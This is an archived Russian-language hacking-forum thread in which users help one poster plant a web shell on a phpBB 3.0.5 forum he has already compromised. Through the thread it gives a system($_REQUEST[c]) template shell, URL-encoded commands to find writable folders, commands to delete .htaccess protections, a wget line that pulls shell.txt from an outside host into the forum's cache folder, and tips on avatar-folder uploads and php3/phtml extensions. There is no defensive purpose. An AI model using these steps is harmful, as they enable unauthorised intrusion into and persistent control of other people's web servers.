PDA

Просмотр полной версии : Помогите с phpBB 3.0.5


BloodKicker
14.08.2009, 22:02
Кто может расписать как залить шелл на форум phpBB версии 3,0,5. директория chache и store под .httaccses

Stinside
14.08.2009, 23:06
Не думаю, что кто-то возьмется за это.
Это же звездец мне кажется геморрой.

BloodKicker
14.08.2009, 23:15
Шелл есть в темплейтах
system($_REQUEST[c])
просто я не знаю куда еще шелл залить.
ПС доступ к админке пока тоже есть

Pashkela
15.08.2009, 16:09
сделай такой запрос - покажет все возможные папки на запись:

&c=system('cd ../; find . -perm -2 -type d -ls');

тьфу, у тебя там уже систем, тогда так:

?c=cd%20../;%20find%20.%20-perm%20-2%20-type%20d%20-ls

BloodKicker
16.08.2009, 14:45
я уже делал но эта злая собака .httaccses мешается( везде

Pashkela
16.08.2009, 15:23
т.е. во всех папках с правами на запись есть .htaccess, запрещающий выполнение php-кода?

хз, можно попробовать отредактировать файлы в корне форума, откуда уж php точно выполняется. Если прав хватит. Просто вставить форму загрузки например в faq.php посредством определенного php-кода через твой шелл в темплейте. Опять же если правов хватает

BloodKicker
16.08.2009, 16:25
а можно подробней, как же отредактировать тот же faq.php через шелл? Если такое возможно то может просто через запрос удалить аксес, а дальше по средствам wget'а заливать шелл

Pashkela
16.08.2009, 16:28
ну дык и удаляй .htaccess, чо ты думаешь

unlink('/абсолютный_путь_до_папки/.htaccess'); - через php
rm /абсолютный_путь_до_папки/.htaccess - через system

опять же если хватит прав

BloodKicker
16.08.2009, 16:50
непрактило, может еще есть способы залить в эту сраку шелл?
И проверьте правильно ли я вообще запрос wget'a кидаю
wget%20-O%20http://kicker-xxx.narod.ru/shell.txt%20/var/www/forum/cache/1.php

Pashkela
16.08.2009, 18:03
причем здесь кеш вообще? А что, папку с авами отменили? Зайди на любую тему в форуме и посмотри свойства авы любого участника - туда и лей, и никаких вгетов, для начала хоть phpinfo.php туда запиши. А то шелл не залил еще, а свой сайт с шеллом уже в логах оставил

Dr.Frank
10.11.2009, 17:13
ТС, попробуй залить с расширением php3 или, скажем phtml